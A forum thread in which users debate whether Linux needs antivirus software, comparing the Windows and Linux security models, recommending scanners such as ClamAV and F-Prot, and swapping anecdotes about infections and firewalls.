wow- isn't there a legnth restriction on these posts?

I agree with you somewhat- however, the main perpose of virus scanning is to REMOVE any malware that might be on you computer. For example if, somehow, a computer does become infected. Then it would be nice to stop that nasty program submitting all your passwords and credit card numbers

I've been thinking though, on windows people get viruses because they download programs from a site that has infected that program with a virus. On linux (for the most part) you dont go combing the web to find a program to download, you download it from a reposatory set up by your distro, so getting a virus like that is much less likely.

Also note that most (good) anti-virus will scan any program that you download.

You obviously don't run Quickbooks, and don't have to run niche market applications. A lot of Windows apps are written such that Admin privileges are required, usually due to the locations of files it wants to write to, registry keys the apps want to access (e.g., HKLM rather than HKLU, etc.), using nonstandard ways to instantiate controls, or simply checking to verify the user has admin access, and of course it's always the totally nontechnical folks who need to run these apps and are always the first to click on that cute "screensaver" or "video" attachment received via email or mindlessly click on "yes" when prompted to install the mouse cursor collection or photo gallery wallpaper or whatever.

....please explain to me the "security model differences" I keep hearing about (i.e., Windows vs Linux).

A friend of mine tried to explain it to me one time, and I sort of understood it. From what I gathered, running in "root" (which is what most Windows users do and most Linux users avoid) is perhaps the biggest risk. Is that all it comes down to? Surely there is more than that. Whether there is more to it or not, could someone explain (in simple n00b English) the 'security model" difference between Windows and Linux?

Thanks!

Here's an interesting take on windows vs linux security.

ClamAv is a daemon for Unix(TM)-like mail servers. It scans the mail before some dumb schmuck downloads it on their Window's box. It scans for whatever malware is in it's database. There's third-party addons for using it outside the email realm.

wow, nice link. Very interesting read.

http://www.f-prot.com/products/home_use/linux/

trying it now. --- still scanning but looks like im ok.

...I remember we had a win box come in the shop the was totally infected ..
( #1 job out there for techs is spyware / virus scans ...anyway)
it was wicked bad - the second you plugged it into the net it would flood the entire subnet.
there was no def for it , no virus scanner could locate and delete it , had to reinstall OS.
that was a wicked virus -- the ISP shut us down , flooding the entire subnet.....

denied - 2 suspicious files could be an archive bomb - i doubt it ...but ?

I would say:"Better be safe than sorry!"

ledow's big post on how bulletproof Linux is impressive ... and makes me feel safer on my Slack.

Nevertheless:
I think every systems administrator has to consider, if he can risk to have a network paralyzed or information lost.

Nowadays Linux does a lot of server tasks for Winblows client networks, like serving mail, sharing for winblows, Databases, Hosting Webs etc.

Even if we could discard 200% that there will never be a threat for the Linux OS, we should protect our Networks at all cost.

It is not just stupid Internet users that bring virus', addware or spyware into our systems...
Every Floppy Drive, CD-Rom, USB-Memorystick, Email can be a possible way in.

ledows says when there in the system they already inside and it is too late. And unfortunately there is mostly no other way to detect them before.

So, you may say I am paranoid, but I think it is a good option to use our Linux boxes to protect the Winblows end users, and at the same time to prevent possible future Linux threats from spreading; especially on mail servers.

As long as there are marketing people with no respect for privacy out there; they will try to figure out our "Internet Browsing Behavior" by any means. Lots of their ways to spy on us are sometimes built into a silly little toolbar from you favorite search engine, mail-, storage- or messaging provider. And they install it without even asking you, bundled into something needful.

There are opensource solutions for antivirus out there, so it is no cost question.

AVG now have free anti-virus software for linux.

There's really no need for antivirus programs on linux systems because:

1. Most people using Linux get their software from repositories set up by Linux distributions. Linux distributions tend to frown on things like spyware and viruses.

In contrast, Windows software comes from a variety of places-- most of whom are just out to make as much money as possible out of you. If that means installing a trojan along with your free goat-themed solitaire game, so be it.

2. Most people on Linux use package managers like RPM. These are pretty standardized, and you can look at the RPM to see what it's going to do when you install it.

In contrast, Windows software always has those horrible "installer" programs that do who-knows-what to your computer. Also, anyone who's ever had a Windows box knows that in many cases, running uninstaller programs doesn't get you back to a clean slate.

3. Linux doesn't have "undeletable files," and it doesn't hide file extensions.

4. Although Microsoft has been working to improve this, most Windows users still run everything as Administrator. The problem is, there's some older Windows programs that require this.

5. Linux has a smaller and more educated user base, so even if there were any viruses, they would have a hard time propagating.
(I really think the other factors are more important, though.)

R.C.

True, Linux doesn't need antivirus software for desktop use. I voted for Yes, though, because I use klamav to scan any .exe .zip and .rar that I download and copy to my winXP partition, especially those I download from untrusted sources like aMule.

Never had a single problem on linux machines with viruses, but with hackers, that is different storry (Hackers deleted complete root on one server!!!).
Since then, first thing I do before connecting to internet is to configure and triple-check a firewall !!!
So, even if You are not afraid of linux viruses, there is a very good reason to secure Your PC.

Regards !

Welcome to LQ

I think linux security is top notch- but thats not the point


IF a virus infects a linux computer (like a keylogger) chances are that the linux user will never know, or will only find out when he/she sees it transmitting/running by chance.

This is a very bad situation, as all credit card numbers- and other important information are likely to be stolen.

Somewhat agree with you, ledow. While truly malicious executables designed to compromise the integrity of systems (i.e. delete /) are a thing of the past in UNIX and UNIX-like systems (if they were ever successfull on a large scale), spyware and adware may be just on the horizon with linux. Already website owners require that Windows users implicitly download their malware as part of the "contract" of viewing their website (which is implicitly agreed to when the user attempts to access it). I wouldn't be surprised if future websites required linux users to download such programs or scripts that would allow their malware to be installed. Consequently, a market for linux malware scanners would develop.

Also, the best measure of defence, on any system, is the intelligence of the user (which, in turn, dictates the strength of the security software installed, if any).

On the side, does anyone know how well the Guard Dog firewall compares to other firewalls? Would it be wise to have redundant firewalls?

isn't the Guard Dog firewall just a front end to iptables?